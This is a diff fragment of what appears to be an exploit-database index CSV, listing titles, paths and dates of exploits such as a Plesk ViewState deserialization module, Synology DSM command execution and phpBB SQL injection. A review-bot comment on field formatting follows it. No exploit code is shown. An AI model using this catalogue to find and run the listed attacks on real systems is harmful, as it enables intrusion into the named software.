48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows,
48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42736,3 +42739,6 @@ id,file,description,date,author,type,platform,port
48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,
48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
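Review bot: The new 48510 row describes the exploit as `GoldWave - Buffer Overflow (SEH Unicode)` with no version, while the file header says 5.70 and the neighbouring rows carry versions (e.g. `VUPlayer 2.49`); use `"GoldWave 5.70 - Buffer Overflow (SEH Unicode)"` so the index stays searchable by version. All six new rows are dated 2020-05-25 although the files themselves carry dates from 2020-05-14 to 2020-05-24, so the column presumably records publication rather than submission date; worth confirming, since nothing in the CSV says which. The port column is left empty for 48513 and 48514 even though their modules default RPORT to 8401 and 5000, which older remote rows in this file do record.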
